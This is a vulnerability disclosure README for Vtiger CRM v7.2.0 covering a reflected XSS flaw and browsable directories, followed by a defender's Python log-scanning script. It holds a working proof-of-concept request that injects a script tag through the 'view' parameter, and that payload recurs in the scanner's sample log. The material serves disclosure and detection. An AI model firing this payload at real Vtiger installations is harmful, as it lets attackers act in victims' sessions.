EmreOvunc/Vtiger-CRM-Vulnerabilities
Vtiger-CRM-Vulnerabilities

Vtiger CRM v7.2.0 has Cross-Site Scripting (XSS) and directory listing vulnerabilities.

CVE-2020-19362 - CVE-2020-19363

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-19362

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-19363

Vtiger CRM Reflected XSS Vulnerability

Reflected XSS in Vtiger CRM v7.2.0 allows an attacker to perform malicious actions in the context of users who open a maliciously crafted link or a third-party web page.

PoC

To exploit the vulnerability, someone could send a GET request to 'http://[server]//vtigercrm/index.php?app=&module=Campaigns&view=%3Ctest%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E', manipulating the 'view' parameter in the request, to affect users who open a maliciously crafted link or a third-party web page.

```http
GET /vtigercrm/index.php?app=&module=Campaigns&view=%3Ctest%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E HTTP/1.1
Host: 172.16.155.128
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSID=nc32t8env2h236vf3s6ftor3im
Upgrade-Insecure-Requests: 1
```


Vtiger CRM Directory Listing Vulnerabilities

PoC

```text
http://[server]/vtigercrm/libraries/
http://[server]/vtigercrm/layouts/
```


Remediation

You should make sure the listed directories do not contain sensitive information, and you may want to restrict directory listings in the web server configuration.
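Detection logic a defender could run over web-server access logs to spot both issues described above (a non-identifier value in the 'view' parameter of index.php, and a 200 response for a bare /libraries/ or /layouts/ directory path). This is an added example, not code from this repository; it assumes Apache combined log format, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines in Apache combined format (not real traffic).
SAMPLE_LOG = """\
172.16.155.1 - - [10/Jun/2020:12:00:01 +0000] "GET /vtigercrm/index.php?module=Campaigns&view=List HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
172.16.155.1 - - [10/Jun/2020:12:00:02 +0000] "GET /vtigercrm/index.php?app=&module=Campaigns&view=%3Ctest%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
172.16.155.1 - - [10/Jun/2020:12:00:03 +0000] "GET /vtigercrm/libraries/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
172.16.155.1 - - [10/Jun/2020:12:00:04 +0000] "GET /vtigercrm/layouts/ HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

# Client IP, request line (method + target) and status code from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Vtiger view names are plain identifiers (List, Detail, Edit, ...); anything else is suspicious.
VIEW_NAME_RE = re.compile(r'^[A-Za-z0-9_]*$')

# Directory paths the advisory reports as browsable; a 200 here means an index listing was served.
LISTABLE_DIRS = ('/vtigercrm/libraries/', '/vtigercrm/layouts/')


def scan_line(line):
    """Return a finding dict for a suspicious request, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    if parts.path.endswith('/index.php'):
        # parse_qs percent-decodes once; unquote again so double-encoded payloads are not missed.
        for raw in parse_qs(parts.query, keep_blank_values=True).get('view', []):
            value = unquote(raw)
            if not VIEW_NAME_RE.match(value):
                return {'ip': m.group('ip'), 'type': 'reflected-xss-probe', 'view': value}
    if parts.path in LISTABLE_DIRS and m.group('status') == '200':
        return {'ip': m.group('ip'), 'type': 'directory-listing', 'path': parts.path}
    return None


def scan_log(text):
    """Scan a whole log and return the list of findings in file order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]
```

A 403 on a directory path (as in the last sample line) produces no finding, so the check also serves as a quick verification that the remediation above is in place.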